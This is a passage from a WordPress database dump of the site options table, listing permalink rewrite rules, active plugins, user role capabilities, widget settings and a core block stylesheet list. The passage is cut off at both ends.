Y','on'),(25,'time_format','g:i a','on'),(26,'links_updated_date_format','F j, Y g:i a','on'),(27,'comment_moderation','','on'),(28,'moderation_notify','1','on'),(29,'permalink_structure','/%postname%/','on'),(30,'rewrite_rules','a:95:{s:11:\"^wp-json/?$\";s:22:\"index.php?rest_route=/\";s:14:\"^wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:21:\"^index.php/wp-json/?$\";s:22:\"index.php?rest_route=/\";s:24:\"^index.php/wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:17:\"^wp-sitemap\\.xml$\";s:23:\"index.php?sitemap=index\";s:17:\"^wp-sitemap\\.xsl$\";s:36:\"index.php?sitemap-stylesheet=sitemap\";s:23:\"^wp-sitemap-index\\.xsl$\";s:34:\"index.php?sitemap-stylesheet=index\";s:48:\"^wp-sitemap-([a-z]+?)-([a-z\\d_-]+?)-(\\d+?)\\.xml$\";s:75:\"index.php?sitemap=$matches[1]&sitemap-subtype=$matches[2]&paged=$matches[3]\";s:34:\"^wp-sitemap-([a-z]+?)-(\\d+?)\\.xml$\";s:47:\"index.php?sitemap=$matches[1]&paged=$matches[2]\";s:47:\"category/(.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:42:\"category/(.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:23:\"category/(.+?)/embed/?$\";s:46:\"index.php?category_name=$matches[1]&embed=true\";s:35:\"category/(.+?)/page/?([0-9]{1,})/?$\";s:53:\"index.php?category_name=$matches[1]&paged=$matches[2]\";s:17:\"category/(.+?)/?$\";s:35:\"index.php?category_name=$matches[1]\";s:44:\"tag/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:39:\"tag/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:20:\"tag/([^/]+)/embed/?$\";s:36:\"index.php?tag=$matches[1]&embed=true\";s:32:\"tag/([^/]+)/page/?([0-9]{1,})/?$\";s:43:\"index.php?tag=$matches[1]&paged=$matches[2]\";s:14:\"tag/([^/]+)/?$\";s:25:\"index.php?tag=$matches[1]\";s:45:\"type/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:40:\"type/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:21:\"type/([^/]+)/embed/?$\";s:44:\"index.php?post_format=$matches[1]&embed=true\";s:33:\"type/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?post_format=$matches[1]&paged=$matches[2]\";s:15:\"type/([^/]+)/?$\";s:33:\"index.php?post_format=$matches[1]\";s:12:\"robots\\.txt$\";s:18:\"index.php?robots=1\";s:13:\"favicon\\.ico$\";s:19:\"index.php?favicon=1\";s:12:\"sitemap\\.xml\";s:23:\"index.php?sitemap=index\";s:48:\".*wp-(atom|rdf|rss|rss2|feed|commentsrss2)\\.php$\";s:18:\"index.php?feed=old\";s:20:\".*wp-app\\.php(/.*)?$\";s:19:\"index.php?error=403\";s:18:\".*wp-register.php$\";s:23:\"index.php?register=true\";s:32:\"feed/(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:27:\"(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:8:\"embed/?$\";s:21:\"index.php?&embed=true\";s:20:\"page/?([0-9]{1,})/?$\";s:28:\"index.php?&paged=$matches[1]\";s:27:\"comment-page-([0-9]{1,})/?$\";s:39:\"index.php?&page_id=44&cpage=$matches[1]\";s:41:\"comments/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:36:\"comments/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:17:\"comments/embed/?$\";s:21:\"index.php?&embed=true\";s:44:\"search/(.+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:39:\"search/(.+)/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:20:\"search/(.+)/embed/?$\";s:34:\"index.php?s=$matches[1]&embed=true\";s:32:\"search/(.+)/page/?([0-9]{1,})/?$\";s:41:\"index.php?s=$matches[1]&paged=$matches[2]\";s:14:\"search/(.+)/?$\";s:23:\"index.php?s=$matches[1]\";s:47:\"author/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:42:\"author/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:23:\"author/([^/]+)/embed/?$\";s:44:\"index.php?author_name=$matches[1]&embed=true\";s:35:\"author/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?author_name=$matches[1]&paged=$matches[2]\";s:17:\"author/([^/]+)/?$\";s:33:\"index.php?author_name=$matches[1]\";s:69:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:64:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:45:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/embed/?$\";s:74:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&embed=true\";s:57:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:81:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&paged=$matches[4]\";s:39:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/?$\";s:63:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]\";s:56:\"([0-9]{4})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:51:\"([0-9]{4})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:32:\"([0-9]{4})/([0-9]{1,2})/embed/?$\";s:58:\"index.php?year=$matches[1]&monthnum=$matches[2]&embed=true\";s:44:\"([0-9]{4})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:65:\"index.php?year=$matches[1]&monthnum=$matches[2]&paged=$matches[3]\";s:26:\"([0-9]{4})/([0-9]{1,2})/?$\";s:47:\"index.php?year=$matches[1]&monthnum=$matches[2]\";s:43:\"([0-9]{4})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:38:\"([0-9]{4})/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:19:\"([0-9]{4})/embed/?$\";s:37:\"index.php?year=$matches[1]&embed=true\";s:31:\"([0-9]{4})/page/?([0-9]{1,})/?$\";s:44:\"index.php?year=$matches[1]&paged=$matches[2]\";s:13:\"([0-9]{4})/?$\";s:26:\"index.php?year=$matches[1]\";s:27:\".?.+?/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\".?.+?/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\".?.+?/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:33:\".?.+?/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:16:\"(.?.+?)/embed/?$\";s:41:\"index.php?pagename=$matches[1]&embed=true\";s:20:\"(.?.+?)/trackback/?$\";s:35:\"index.php?pagename=$matches[1]&tb=1\";s:40:\"(.?.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:35:\"(.?.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:28:\"(.?.+?)/page/?([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&paged=$matches[2]\";s:35:\"(.?.+?)/comment-page-([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&cpage=$matches[2]\";s:24:\"(.?.+?)(?:/([0-9]+))?/?$\";s:47:\"index.php?pagename=$matches[1]&page=$matches[2]\";s:27:\"[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\"[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\"[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\"[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\"[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:33:\"[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:16:\"([^/]+)/embed/?$\";s:37:\"index.php?name=$matches[1]&embed=true\";s:20:\"([^/]+)/trackback/?$\";s:31:\"index.php?name=$matches[1]&tb=1\";s:40:\"([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?name=$matches[1]&feed=$matches[2]\";s:35:\"([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?name=$matches[1]&feed=$matches[2]\";s:28:\"([^/]+)/page/?([0-9]{1,})/?$\";s:44:\"index.php?name=$matches[1]&paged=$matches[2]\";s:35:\"([^/]+)/comment-page-([0-9]{1,})/?$\";s:44:\"index.php?name=$matches[1]&cpage=$matches[2]\";s:24:\"([^/]+)(?:/([0-9]+))?/?$\";s:43:\"index.php?name=$matches[1]&page=$matches[2]\";s:16:\"[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:26:\"[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:46:\"[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:41:\"[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:41:\"[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:22:\"[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";}','on'),(31,'hack_file','0','on'),(32,'blog_charset','UTF-8','on'),(33,'moderation_keys','','off'),(34,'active_plugins','a:7:{i:0;s:61:\"all-404-redirect-to-homepage/all-404-redirect-to-homepage.php\";i:1;s:31:\"elementor-pro/elementor-pro.php\";i:2;s:23:\"elementor/elementor.php\";i:3;s:37:\"imunify-security/imunify-security.php\";i:4;s:35:\"litespeed-cache/litespeed-cache.php\";i:5;s:27:\"updraftplus/updraftplus.php\";i:6;s:24:\"wordpress-seo/wp-seo.php\";}','on'),(35,'category_base','','on'),(36,'ping_sites','https://rpc.pingomatic.com/','on'),(37,'comment_max_links','2','on'),(38,'gmt_offset','0','on'),(39,'default_email_category','1','on'),(40,'recently_edited','a:2:{i:0;s:76:\"/home/msgdhg02/public_html/amb18b.com/wp-content/plugins/akismet/akismet.php\";i:1;s:0:\"\";}','off'),(41,'template','hello-elementor','on'),(42,'stylesheet','hello-elementor','on'),(43,'comment_registration','','on'),(44,'html_type','text/html','on'),(45,'use_trackback','0','on'),(46,'default_role','subscriber','on'),(47,'db_version','61833','on'),(48,'uploads_use_yearmonth_folders','1','on'),(49,'upload_path','','on'),(50,'blog_public','1','on'),(51,'default_link_category','2','on'),(52,'show_on_front','page','on'),(53,'tag_base','','on'),(54,'show_avatars','1','on'),(55,'avatar_rating','G','on'),(56,'upload_url_path','','on'),(57,'thumbnail_size_w','150','on'),(58,'thumbnail_size_h','150','on'),(59,'thumbnail_crop','1','on'),(60,'medium_size_w','300','on'),(61,'medium_size_h','300','on'),(62,'avatar_default','mystery','on'),(63,'large_size_w','1024','on'),(64,'large_size_h','1024','on'),(65,'image_default_link_type','none','on'),(66,'image_default_size','','on'),(67,'image_default_align','','on'),(68,'close_comments_for_old_posts','','on'),(69,'close_comments_days_old','14','on'),(70,'thread_comments','1','on'),(71,'thread_comments_depth','5','on'),(72,'page_comments','','on'),(73,'comments_per_page','50','on'),(74,'default_comments_page','newest','on'),(75,'comment_order','asc','on'),(76,'sticky_posts','a:0:{}','on'),(77,'widget_categories','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','auto'),(78,'widget_text','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','auto'),(79,'widget_rss','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','auto'),(80,'uninstall_plugins','a:3:{s:23:\"elementor/elementor.php\";a:2:{i:0;s:21:\"Elementor\\Maintenance\";i:1;s:9:\"uninstall\";}s:24:\"wordpress-seo/wp-seo.php\";s:14:\"__return_false\";s:35:\"litespeed-cache/litespeed-cache.php\";s:47:\"LiteSpeed\\Activation::uninstall_litespeed_cache\";}','off'),(81,'timezone_string','','on'),(82,'page_for_posts','0','on'),(83,'page_on_front','44','on'),(84,'default_post_format','0','on'),(85,'link_manager_enabled','0','on'),(86,'finished_splitting_shared_terms','1','on'),(87,'site_icon','368','on'),(88,'medium_large_size_w','768','on'),(89,'medium_large_size_h','0','on'),(90,'wp_page_for_privacy_policy','3','on'),(91,'show_comments_cookies_opt_in','1','on'),(92,'admin_email_lifespan','1788707188','on'),(93,'disallowed_keys','','off'),(94,'comment_previously_approved','1','on'),(95,'auto_plugin_theme_update_emails','a:0:{}','off'),(96,'auto_update_core_dev','enabled','on'),(97,'auto_update_core_minor','enabled','on'),(98,'auto_update_core_major','enabled','on'),(99,'wp_force_deactivated_plugins','a:0:{}','on'),(100,'wp_attachment_pages_enabled','0','on'),(101,'initial_db_version','60421','on'),(102,'IwGJ28BV_user_roles','a:7:{s:13:\"administrator\";a:2:{s:4:\"name\";s:13:\"Administrator\";s:12:\"capabilities\";a:69:{s:13:\"switch_themes\";b:1;s:11:\"edit_themes\";b:1;s:16:\"activate_plugins\";b:1;s:12:\"edit_plugins\";b:1;s:10:\"edit_users\";b:1;s:10:\"edit_files\";b:1;s:14:\"manage_options\";b:1;s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:6:\"import\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:8:\"level_10\";b:1;s:7:\"level_9\";b:1;s:7:\"level_8\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:12:\"delete_users\";b:1;s:12:\"create_users\";b:1;s:17:\"unfiltered_upload\";b:1;s:14:\"edit_dashboard\";b:1;s:14:\"update_plugins\";b:1;s:14:\"delete_plugins\";b:1;s:15:\"install_plugins\";b:1;s:13:\"update_themes\";b:1;s:14:\"install_themes\";b:1;s:11:\"update_core\";b:1;s:10:\"list_users\";b:1;s:12:\"remove_users\";b:1;s:13:\"promote_users\";b:1;s:18:\"edit_theme_options\";b:1;s:13:\"delete_themes\";b:1;s:6:\"export\";b:1;s:26:\"create_notes_elementor-pro\";b:1;s:24:\"edit_notes_elementor-pro\";b:1;s:26:\"delete_notes_elementor-pro\";b:1;s:24:\"read_notes_elementor-pro\";b:1;s:31:\"edit_others_notes_elementor-pro\";b:1;s:33:\"delete_others_notes_elementor-pro\";b:1;s:39:\"read_others_private_notes_elementor-pro\";b:1;s:20:\"wpseo_manage_options\";b:1;}}s:6:\"editor\";a:2:{s:4:\"name\";s:6:\"Editor\";s:12:\"capabilities\";a:36:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:15:\"wpseo_bulk_edit\";b:1;s:28:\"wpseo_edit_advanced_metadata\";b:1;}}s:6:\"author\";a:2:{s:4:\"name\";s:6:\"Author\";s:12:\"capabilities\";a:10:{s:12:\"upload_files\";b:1;s:10:\"edit_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;s:22:\"delete_published_posts\";b:1;}}s:11:\"contributor\";a:2:{s:4:\"name\";s:11:\"Contributor\";s:12:\"capabilities\";a:5:{s:10:\"edit_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;}}s:10:\"subscriber\";a:2:{s:4:\"name\";s:10:\"Subscriber\";s:12:\"capabilities\";a:2:{s:4:\"read\";b:1;s:7:\"level_0\";b:1;}}s:13:\"wpseo_manager\";a:2:{s:4:\"name\";s:11:\"SEO Manager\";s:12:\"capabilities\";a:38:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:15:\"wpseo_bulk_edit\";b:1;s:28:\"wpseo_edit_advanced_metadata\";b:1;s:20:\"wpseo_manage_options\";b:1;s:23:\"view_site_health_checks\";b:1;}}s:12:\"wpseo_editor\";a:2:{s:4:\"name\";s:10:\"SEO Editor\";s:12:\"capabilities\";a:36:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:15:\"wpseo_bulk_edit\";b:1;s:28:\"wpseo_edit_advanced_metadata\";b:1;}}}','on'),(103,'fresh_site','0','off'),(104,'user_count','3','off'),(105,'widget_block','a:6:{i:2;a:1:{s:7:\"content\";s:19:\"<!-- wp:search /-->\";}i:3;a:1:{s:7:\"content\";s:154:\"<!-- wp:group --><div class=\"wp-block-group\"><!-- wp:heading --><h2>Recent Posts</h2><!-- /wp:heading --><!-- wp:latest-posts /--></div><!-- /wp:group -->\";}i:4;a:1:{s:7:\"content\";s:227:\"<!-- wp:group --><div class=\"wp-block-group\"><!-- wp:heading --><h2>Recent Comments</h2><!-- /wp:heading --><!-- wp:latest-comments {\"displayAvatar\":false,\"displayDate\":false,\"displayExcerpt\":false} /--></div><!-- /wp:group -->\";}i:5;a:1:{s:7:\"content\";s:146:\"<!-- wp:group --><div class=\"wp-block-group\"><!-- wp:heading --><h2>Archives</h2><!-- /wp:heading --><!-- wp:archives /--></div><!-- /wp:group -->\";}i:6;a:1:{s:7:\"content\";s:150:\"<!-- wp:group --><div class=\"wp-block-group\"><!-- wp:heading --><h2>Categories</h2><!-- /wp:heading --><!-- wp:categories /--></div><!-- /wp:group -->\";}s:12:\"_multiwidget\";i:1;}','auto'),(106,'sidebars_widgets','a:2:{s:19:\"wp_inactive_widgets\";a:5:{i:0;s:7:\"block-2\";i:1;s:7:\"block-3\";i:2;s:7:\"block-4\";i:3;s:7:\"block-5\";i:4;s:7:\"block-6\";}s:13:\"array_version\";i:3;}','auto'),(107,'widget_pages','a:1:{s:12:\"_multiwidget\";i:1;}','auto'),(108,'widget_calendar','a:1:{s:12:\"_multiwidget\";i:1;}','auto'),(109,'widget_archives','a:1:{s:12:\"_multiwidget\";i:1;}','auto'),(110,'widget_media_audio','a:1:{s:12:\"_multiwidget\";i:1;}','auto'),(111,'widget_media_image','a:1:{s:12:\"_multiwidget\";i:1;}','auto'),(112,'widget_media_gallery','a:1:{s:12:\"_multiwidget\";i:1;}','auto'),(113,'widget_media_video','a:1:{s:12:\"_multiwidget\";i:1;}','auto'),(114,'widget_meta','a:1:{s:12:\"_multiwidget\";i:1;}','auto'),(115,'widget_search','a:1:{s:12:\"_multiwidget\";i:1;}','auto'),(116,'widget_recent-posts','a:1:{s:12:\"_multiwidget\";i:1;}','auto'),(117,'widget_recent-comments','a:1:{s:12:\"_multiwidget\";i:1;}','auto'),(118,'widget_tag_cloud','a:1:{s:12:\"_multiwidget\";i:1;}','auto'),(119,'widget_nav_menu','a:1:{s:12:\"_multiwidget\";i:1;}','auto'),(120,'widget_custom_html','a:1:{s:12:\"_multiwidget\";i:1;}','auto'),(121,'_transient_wp_core_block_css_files','a:2:{s:7:\"version\";s:5:\"6.9.4\";s:5:\"files\";a:584:{i:0;s:31:\"accordion-heading/style-rtl.css\";i:1;s:35:\"accordion-heading/style-rtl.min.css\";i:2;s:27:\"accordion-heading/style.css\";i:3;s:31:\"accordion-heading/style.min.css\";i:4;s:28:\"accordion-item/style-rtl.css\";i:5;s:32:\"accordion-item/style-rtl.min.css\";i:6;s:24:\"accordion-item/style.css\";i:7;s:28:\"accordion-item/style.min.css\";i:8;s:29:\"accordion-panel/style-rtl.css\";i:9;s:33:\"accordion-panel/style-rtl.min.css\";i:10;s:25:\"accordion-panel/style.css\";i:11;s:29:\"accordion-panel/style.min.css\";i:12;s:23:\"accordion/style-rtl.css\";i:13;s:27:\"accordion/style-rtl.min.css\";i:14;s:19:\"accordion/style.css\";i:15;s:23:\"accordion/style.min.css\";i:16;s:23:\"archives/editor-rtl.css\";i:17;s:27:\"archives/editor-rtl.min.css\";i:18;s:19:\"archives/editor.css\";i:19;s:23:\"archives/editor.min.css\";i:20;s:22:\"archives/style-rtl.css\";i:21;s:26:\"archives/style-rtl.min.css\";i:22;s:18:\"archives/style.css\";i:23;s:22:\"archives/style.min.css\";i:24;s:20:\"audio/editor-rtl.css\";i:25;s:24:\"audio/editor-rtl.min.css\";i:26;s:16:\"audio/editor.css\";i:27;s:20:\"audio/editor.min.css\";i:28;s:19:\"audio/style-rtl.css\";i:29;s:23:\"audio/style-rtl.min.css\";i:30;s:15:\"audio/style.css\";i:31;s:19:\"audio/style.min.css\";i:32;s:19:\"audio/theme-rtl.css\";i:33;s:23:\"audio/theme-rtl.min.css\";i:34;s:15:\"audio/theme.css\";i:35;s:19:\"audio/theme.min.css\";i:36;s:21:\"avatar/editor-rtl.css\";i:37;s:25:\"avatar/editor-rtl.min.css\";i:38;s:17:\"avatar/editor.css\";i:39;s:21:\"avatar/editor.min.css\";i:40;s:20:\"avatar/style-rtl.css\";i:41;s:24:\"avatar/style-rtl.min.css\";i:42;s:16:\"avatar/style.css\";i:43;s:20:\"avatar/style.min.css\";i:44;s:21:\"button/editor-rtl.css\";i:45;s:25:\"button/editor-rtl.min.css\";i:46;s:17:\"button/editor.css\";i:47;s:21:\"button/editor.min.css\";i:48;s:20:\"button/style-rtl.css\";i:49;s:24:\"button/style-rtl.min.css\";i:50;s:16:\"button/style.css\";i:51;s:20:\"button/style.min.css\";i:52;s:22:\"buttons/editor-rtl.css\";i:53;s:26:\"buttons/editor-rtl.min.css\";i:54;s:18:\"buttons/editor.css\";i:55;s:22:\"buttons/editor.min.css\";i:56;s:21:\"buttons/style-rtl.css\";i:57;s:25:\"buttons/style-rtl.min.css\";i:58;s:17:\"buttons/style.css\";i:59;s:21:\"buttons/style.min.css\";i:60;s:22:\"calendar/style-rtl.css\";i:61;s:26:\"calendar/style-rtl.min.css\";i:62;s:18:\"calendar/style.css\";i:63;s:22:\"calendar/style.min.css\";i:64;s:25:\"categories/editor-rtl.css\";i:65;s:29:\"categories/editor-rtl.min.css\";i:66;s:21:\"categories/editor.css\";i:67;s:25:\"categories/editor.min.css\";i:68;s:24:\"categories/style-rtl.css\";i:69;s:28:\"categories/style-rtl.min.css\";i:70;s:20:\"categories/style.css\";i:71;s:24:\"categories/style.min.css\";i:72;s:19:\"code/editor-rtl.css\";i:73;s:23:\"code/editor-rtl.min.css\";i:74;s:15:\"code/editor.css\";i:75;s:19:\"code/editor.min.css\";i:76;s:18:\"code/style-rtl.css\";i:77;s:22:\"code/style-rtl.min.css\";i:78;s:14:\"code/style.css\";i:79;s:18:\"code/style.min.css\";i:80;s:18:\"code/theme-rtl.css\";i:81;s:22:\"code/theme-rtl.min.css\";i:82;s:14:\"code/theme.css\";i:83;s:18:\"code/theme.min.css\";i:84;s:22:\"columns/editor-rtl.css\";i:85;s:26:\"columns/editor-rtl.min.css\";i:86;s:18:\"columns/editor.css\";i:87;s:22:\"columns/editor.min.css\";i:88;s:21:\"columns/style-rtl.css\";i:89;s:25:\"columns/style-rtl.min.css\";i:90;s:17:\"columns/style.css\";i:91;s:21:\"columns/style.min.css\";i:92;s:33:\"comment-author-name/style-rtl.css\";i:93;s:37:\"comment-author-name/style-rtl.min.css\";i:94;s:29:\"comment-author-name/style.css\";i:95;s:33:\"comment-author-name/style.min.css\";i:96;s:29:\"comment-content/style-rtl.css\";i:97;s:33:\"comment-content/style-rtl.min.css\";i:98;s:25:\